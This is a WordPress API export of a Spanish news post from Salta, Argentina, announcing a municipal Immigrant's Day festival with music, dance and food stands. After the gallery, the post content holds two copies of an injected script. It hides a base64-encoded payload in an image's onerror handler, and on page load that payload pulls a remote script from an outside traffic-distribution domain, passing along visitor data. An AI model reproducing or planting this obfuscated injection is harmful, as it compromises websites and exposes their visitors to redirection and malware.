{"id":1400,"date":"2022-08-31T13:35:00","date_gmt":"2022-08-31T16:35:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1400"},"modified":"2025-08-14T00:36:50","modified_gmt":"2025-08-14T03:36:50","slug":"el-domingo-4-sera-recordado-el-dia-del-inmigrante","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1400","title":{"rendered":"El domingo 4 ser\u00e1 recordado el D\u00eda del Inmigrante\u00a0"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#c90737\"><strong><em>Se desarrollar\u00e1 un encuentro multicultural a partir de las 11 en el anfiteatro Cuchi\u00a0Leguizam\u00f3n. Habr\u00e1 presentaciones de danza y m\u00fasica y stands con comidas t\u00edpicas.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Turismo y Cultura y el&nbsp;programa de Comunidades Migrantes y Asuntos Extranjeros, invita a la celebraci\u00f3n del D\u00eda del Inmigrante este domingo 4 de septiembre,&nbsp;desde las 11 en el anfiteatro Cuchi Leguizam\u00f3n del parque San Mart\u00edn.<\/p>\n\n\n\n<p>Este&nbsp;espacio permitir\u00e1 las expresiones de las diferentes colectividades extranjeras residentes en la ciudad, tanto sobre el escenario con propuestas culturales, as\u00ed como en el predio, ya que se realizar\u00e1 una feria con stands de los pa\u00edses participantes con actividades y&nbsp;la posibilidad de degustar platos tradicionales.<\/p>\n\n\n\n<p>Dentro del programa para el domingo 4 de septiembre, se destaca la presentaci\u00f3n de Banda de M\u00fasica municipal \u201c25 de Mayo\u201d y la&nbsp;entrega de certificados a las personas destacadas de cada comunidad por parte de la&nbsp;Direcci\u00f3n Nacional de Migraciones \u2013 Delegaci\u00f3n Salta<\/p>\n\n\n\n<p>En&nbsp;la ciudad de Salta hay 12 representaciones consulares de 23 pa\u00edses, quienes aportar\u00e1n colorido a esta jornada intercultural.<\/p>\n\n\n\n<p>Es importante destacar que el ciclo Salta Celebra contiene actividades protocolares de cada una de las representaciones en la ciudad desde el comienzo de esta gesti\u00f3n municipal.<\/p>\n\n\n\n<p>\u00abDesde la Municipalidad extendemos el saludo a cada una de las comunidades que decidieron&nbsp;radicarse en esta tierra para compartir con generosidad su cultura y en una pol\u00edtica de interculturalidad propiciamos espacios de participaci\u00f3n, di\u00e1logo&nbsp;y expresiones culturales. Es principio del municipio que el di\u00e1logo sea&nbsp;m\u00e1s&nbsp;fluido por ello realizamos \u00abConvenios de Hermanamiento\u00bb que firmamos con todos para el desarrollo tur\u00edstico, econ\u00f3mico y cultural\u00bb explic\u00f3 Gabriela Gonz\u00e1lez,&nbsp;jefa del programa Migrantes y Asuntos Extranjeros.<\/p>\n\n\n\n<p>Cada 4 de septiembre se celebra en Argentina el D\u00eda del Inmigrante, fecha que se estableci\u00f3 a trav\u00e9s de un decreto Nacional en 1.949 para recordar la llegada de los inmigrantes al pa\u00eds en recuerdo de la disposici\u00f3n dictada por el Primer Triunvirato, que dispone \u201cinmediata protecci\u00f3n a los individuos de todas las naciones y a sus familias que deseen fijar su domicilio en este territorio\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"684\" data-id=\"1401\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-1024x684.jpg\" alt=\"\" class=\"wp-image-1401\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-1024x684.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-1536x1025.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-1068x713.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-1920x1282.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10-629x420.jpg 629w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-10.jpg 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1402\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-7-1024x683-1.jpg\" alt=\"\" class=\"wp-image-1402\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-7-1024x683-1.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-7-1024x683-1-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-7-1024x683-1-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-7-1024x683-1-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/colectividades-extranjeras-7-1024x683-1-630x420.jpg 630w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1403\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2-1024x683.jpeg\" alt=\"\" class=\"wp-image-1403\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2-1024x683.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2-1068x713.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2-630x420.jpeg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/inmigrantes-2.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se desarrollar\u00e1 un encuentro multicultural a partir de las 11 en el anfiteatro Cuchi\u00a0Leguizam\u00f3n. Habr\u00e1 presentaciones de danza y m\u00fasica y stands con comidas t\u00edpicas. La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Turismo y Cultura y el&nbsp;programa de Comunidades Migrantes y Asuntos Extranjeros, invita a la celebraci\u00f3n del D\u00eda del Inmigrante este [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1404,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13,17],"tags":[],"class_list":{"0":"post-1400","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1400"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1400"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1400\/revisions"}],"predecessor-version":[{"id":7370,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1400\/revisions\/7370"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1404"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1400"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1400"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1400"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}